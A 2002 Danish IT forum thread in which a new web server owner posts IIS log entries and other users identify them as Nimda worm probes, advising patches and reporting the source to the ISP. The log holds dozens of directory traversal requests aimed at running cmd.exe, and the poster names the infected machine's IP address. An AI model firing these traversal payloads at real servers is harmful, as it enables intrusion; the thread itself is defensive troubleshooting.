CIO Tech Eksperten IT-JOB IT-Kurser Events Podcast Søg
Cookie ikon
Avatar billede riversen Nybegynder
16. september 2002 - 07:16 Der er 11 kommentarer og
1 løsning

IIS Log

Er ny indenfor webserver.

Jeg ville lige prøve at kigge i loggen og lægger mærke til følgende linier

2002-09-15 19:05:09 80.198.31.44 - 192.168.1.10 80 GET /scripts/root.exe /c+dir 404 -
2002-09-15 19:05:09 80.198.31.44 - 192.168.1.10 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-15 19:05:10 80.198.31.44 - 192.168.1.10 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:05:10 80.198.31.44 - 192.168.1.10 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:05:11 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:05:11 80.198.31.44 - 192.168.1.10 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:05:11 80.198.31.44 - 192.168.1.10 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:05:11 80.198.31.44 - 192.168.1.10 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-09-15 19:05:13 80.198.31.44 - 192.168.1.10 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:05:13 80.198.31.44 - 192.168.1.10 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:05:14 80.198.31.44 - 192.168.1.10 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:05:14 80.198.31.44 - 192.168.1.10 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:05:15 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:05:15 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:05:15 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:05:16 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:10:56 80.198.31.44 - 192.168.1.10 80 GET /scripts/root.exe /c+dir 404 -
2002-09-15 19:10:56 80.198.31.44 - 192.168.1.10 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-15 19:10:56 80.198.31.44 - 192.168.1.10 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:10:56 80.198.31.44 - 192.168.1.10 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:10:58 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:10:58 80.198.31.44 - 192.168.1.10 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:10:58 80.198.31.44 - 192.168.1.10 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:10:59 80.198.31.44 - 192.168.1.10 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-09-15 19:10:59 80.198.31.44 - 192.168.1.10 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:10:59 80.198.31.44 - 192.168.1.10 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:10:59 80.198.31.44 - 192.168.1.10 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:11:00 80.198.31.44 - 192.168.1.10 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:11:00 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:11:00 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:11:00 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:11:00 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 20:34:45 212.237.190.95 - 192.168.1.10 80 GET /index.html - 304 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0)

den sidste linie er mig der har været inde på siden...men hvad er de andre? De optræder hyppigt med forskellige ip-adresser.
Avatar billede bufferzone Praktikant
16. september 2002 - 09:14 #1
Jeg synes det ligner et Nimda angreb, men kan selvfølgelig også være et script der er kørt af mod dig. Jeg er dog ret sikker på Nimda
Avatar billede bocker Nybegynder
16. september 2002 - 09:44 #2
Har du installeret alle sikkerhedsopdateringer på din server?
Avatar billede bocker Nybegynder
16. september 2002 - 09:44 #3
Anyway, meld ip'en til ejeren, og send loggen med...
Avatar billede riversen Nybegynder
16. september 2002 - 11:11 #4
virusscanner har ikke brokket sig...
Avatar billede riversen Nybegynder
16. september 2002 - 11:14 #5
er patch ikke med i sp3?
Avatar billede bocker Nybegynder
16. september 2002 - 12:50 #6
Jo, men jeg tænkte på at der var en exploit for noget tid tilbage, hvor man kunne gå ind og bruge cmd.exe via iis... Så hvis du ikke havde fået installeret alle service packs / patches kunne det være det.
Avatar billede bocker Nybegynder
16. september 2002 - 12:53 #7
remarks:      +---------------------------------------+
remarks:      | For abuse and security issues contact |
remarks:      | csirt@csirt.dk, http://www.csirt.dk  |
remarks:      +---------------------------------------+

Hvis du slår IP'en op på www.ripe.net under Whois DB, kan du se det er en TDC ip, så skriv til adressen herover, så kan de nok finde ud af om det er en med virus, der sidder i den anden ende.
Avatar billede riversen Nybegynder
16. september 2002 - 13:55 #8
jeg har snakket med tdc, så de gør vidst noget ved det.

Jeg kunne også se det var tdc kunde via tracert kommandoen

Han har med sikkerhed nimda... hold jer fra http://80.198.31.44/index.asp !!!

faktisk kan jeg tilgå hans pc via ip'en, så han har et seriøst sikkerhedsproblem.
Avatar billede riversen Nybegynder
16. september 2002 - 13:55 #9
bocker: jeg har installeret alt under windows update...er det ok? eller hvor kan jeg få fat i den patch du snakker om
Avatar billede bocker Nybegynder
16. september 2002 - 14:06 #10
Du burde være sikret så, den var med i en af de seneste SP.
Avatar billede riversen Nybegynder
16. september 2002 - 14:27 #11
ok...virusscanneren burde vel også afvise. De undrer mig bare at der er mangel forskellige ip-adresser, men jeg må lige tjekke det nærmere, når jeg kommer hjem...så jeg kan få et overblik over omfanget
Avatar billede riversen Nybegynder
16. september 2002 - 14:34 #12
mangel = mange :-)
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview

Flere spørgsmål fra Windows kategorien

Titel Indlæg Oprettet Seneste aktivitet
win 10 vil ikke boote Af bb69 i Windows 4 I går 16:05 I dag 01:35
Kan ikke udvide C drevet. Af valby i Windows 12 23/05/202423:05 24/05/202420:17
Firefox adresse fra Firefox ned på proceslinjen Af valby i Windows 11 16/05/202418:08 18/05/202421:16
Låst konto Af densortehingst i Windows 2 16/05/202409:55 16/05/202414:00
Windows 11 23H2. Højre klik menu. Af Jan Post i Windows 21 15/05/202412:21 18/05/202413:18
Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Opret Log ind

Du kan også logge ind via nedenstående tjenester



Alle kategorier på Eksperten
Seneste spørgsmål Seneste aktivitet
I går 20:46 opkaldside Af hagbartm i Mobiltelefoner
I går 16:05 win 10 vil ikke boote Af bb69 i Windows
I går 11:20 Lenovo x390 Af tobberjas i PC
I går 10:14 Alder i Excel Af Nanarsi i Excel
I går 09:00 Flere linier på faneblad Af Peder Lund Nielsen i Excel
White papers
Flere white papers »


Premium
Teaser billede
Rigsrevisionen kritiserer fire statslige myndigheder for dårlig it-sikkerhed: Har haft seks år til at løse problemet
Læs mere »
Microsofts nye Windows 11-funktion kaldes ”en guldgrube for hackere”
"Jeg var den sjette medarbejder, der blev ansat dengang, i dag er vi over 1000"
Twoday rykker hovedkontoret til Nordhavn: Opsiger flere lejemål og samler kontorer
Se alle »
Computerworld
Teaser billede
MobilePay ændrer på funktion få måneder efter stor opdatering
Læs mere »
Den næste version af Windows 11 er nu tilgængelig for de første brugere: Se, hvad du kan forvente
Kæmpemæssig AI-opdatering styrer mod din iPhone: Derfor bliver iOS 18 særlig interessant
Jeg havde simpelthen aldrig forestillet mig, at det nye Rejsekort ville minde om noget, der var udtænkt af IBM i 60’erne
Se alle »
CIO
Teaser billede
Energinet får igen kritik for milliardstor outsourcing: To væsentlige it-sikkerhedstiltag er ikke blevet indført til tiden
Læs mere »
Nomineret til Årets CIO: Martin Wood har skabt en leveringsmaskine hos Domstolsstyrelsen - Håber det kan inspirere andre offentlige myndigheder
Han er en af Danmarks bedste CIO’er: Topdanmarks Kasper Tjørntved Davidsen står i spidsen for digitale transformationer til milliarder af kroner
Bestyrelser på pinebænken under hackerangreb: "Altså 500.000 euro i løsesum er jo ikke så meget"
Se alle »
Job & Karriere
Teaser billede
Her er Danmarks fem bedste CIO’er lige nu: Se de fem nominerede til prisen som Årets CIO 2024
Læs mere »
Medarbejderne fik udleveret badetøfler ved indflytningen: Kom med inden for i IBM Danmarks nye topmoderne hovedkontor
Google fyrer hele sit Python-team
Får du den løn, du fortjener? Få overblikket over hvor meget dine kolleger tjener hver måned
Se alle »
White paper
Teaser billede
Vejen væk fra WAN: Sådan skifter du til en moderne infrastruktur
Læs mere »
Guide: Sådan udvikler du en moderne netværksstrategi
Rapport kortlægger de 13 bedste muligheder for at sætte turbo på din cloud computing
MDR: Transparent sikkerhed og overvågning i realtid
Se alle »

Events
Flere events »
White papers
Flere white papers »
IT-Kurser
Se alle vores it-kurser »